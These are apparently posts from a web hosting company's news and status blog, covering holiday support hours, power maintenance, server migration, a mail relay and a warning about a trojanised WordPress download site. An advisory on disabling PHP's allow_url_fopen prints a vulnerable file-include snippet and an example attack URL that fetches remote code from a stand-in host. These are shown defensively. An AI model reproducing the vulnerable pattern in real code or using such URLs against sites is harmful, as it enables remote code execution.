Web Hosting Resource

This is the first in a series of basic tutorials to help in installing open-source applications on Pipe Tens hosting services from source. Read the rest of this entry »

It’s been a busy year here at Pipe Ten and we’re ready for a mince pie (or ten).

We’d like to take this opportunity to thank all of our customers for an excellent past year and to wish you the best of luck in the next.

Support is available as usual for the entirety of the festive period, we will however be operating reduced support staff on Christmas and New Years day while filling our bellies and resting our livers.

We’ve a big list of great new features and improvements we’re working on and hope to bring you in the new year, so watch this space.

Closed: Maintenance completed without issue/as expected.
Read the rest of this entry »

Brief: We are performing essential power maintenance and upgrades.

Timeframe: Between 08:00 Friday 30th January and 10:00 Friday 30th January 2009.

Expected Impact: Servers within our Sheffield facility will need to be moved to a new power feed causing around 15 minutes outage per device.

What you need to do: All customers are advised to check their sites availability and functionality after this maintenance window. While we will endeavor to check all sites but this is a time consuming task and user reported issues will be dealt with as the highest priority.

As ever, please feel free to contact us if you have any questions or suggestions via the control panel support system.

Customers that are hosted on our Dublin based servers that would like to move over to our Sheffield based servers can now do so with relative ease. Customers hosted in Sheffield can benefit from more advanced features such as SQL Server 2005, .NET 3.5, PHP 4 & 5 on a per domain basis, customisable virus and spam filtering, comprehensive backups and easily installable open source software. Customers would have to migrate their website’s data themselves but Pipe Ten will set them up with an account with a FREE month on it to ease the migration. Pipe Ten would also obviously migrate any unused credit over when customers close the Dublin account.

If you are interested in taking advantage of this please contact support who will be able to assist setting up your new account.

Closed. Read the rest of this entry »

webform.pipeten.co.uk is a dedicated email server for handling email generated by Pipe Tens web servers.  If you are wishing to use a form or script on your website to send emails and are prom[ted to specify a relay or smtp server then please use webform.pipeten.co.uk.  Using mail.pipeten.co.uk or mail.youdomain.ext may return ‘relay denied’ or other errors for sending to non-local domains.

We keep individual POP/IMAP/SMTP mailboxes separate to the web server generated email as part of anti-spam/blacklisting prevention and monitoring measures.

Brief: On Monday November 24th we will be changing a php.ini configuration option on all of our shared hosting servers which may affect your website code.

Currently all Sheffield Linux servers run with the option allow_url_fopen=On. On November 24th we will be changing the option to allow_url_fopen=Off.

The reasons for this change and its impact are as follows…

With this option enabled, all of PHP’s file handling functions will accept a full URL as a parameter and will download that page and use it as a file. This is very convenient in a number of applications such as retrieving RSS feeds. Unfortunately it leads to unexpected results and serious security problems in many applications. For example in the following simple code…

$pagef = $_REQUEST["pagef"];
include ($pagef);

The programmer intends that the pagef request string will specify a file somewhere in the account to be included as part of the main page, to be called with a request like…

http://mydomain.com/display.php?pagef=footer.html

An attacker can create his own URL and exploit this page to download and execute his own code on your web site e.g.

http://mydomain.com/display.php?pagef=http://evil.info/exploit.txt

Expected Impact: By disabling the allow_url_fopen option, this attack vector is closed off while still allowing the intended function of such site code. The drawback is that other code which might for example use

readfile(”http://feeds.feedburner.com/DilbertDailyStrip”);

to retrieve a remote RSS feed will no longer work.

What you need to do: The supported alternative is Curl which is available to PHP on all of our servers. Many popular applications will automatically fall back on the Curl functions however you may need to upgrade to the latest version of your web application. The PHP documentation for the Curl functions is available at http://www.php.net/manual/en/ref.curl.php

Closed. Read the rest of this entry »

“It looks like sites which have not upgraded to 2.6.3 are being exploited in an interesting way whereby a hacker, probably using an automated script, is hacking into sites with the vulnerability and changing the settings of one of the dashboard modules to point to a different feed thereby encouraging people to go to a different site which is offering a dodgy upgrade.”

That was the response of Peter Westwood (one of the lead developers of popular blogging software provider Wordpress) upon news that some of its users with an outdated Wordpress installation may be prompted to download a more compromised version from a spoof website (wordpresZ.org).

It’s important that all customers verify the source, security and legitimacy of any software that they install to their Pipe Ten hosting accounts and pay special attention when upgrading.

Read more at The Register - Fake site punts Trojanised WordPress and additional analysis at the sources blog.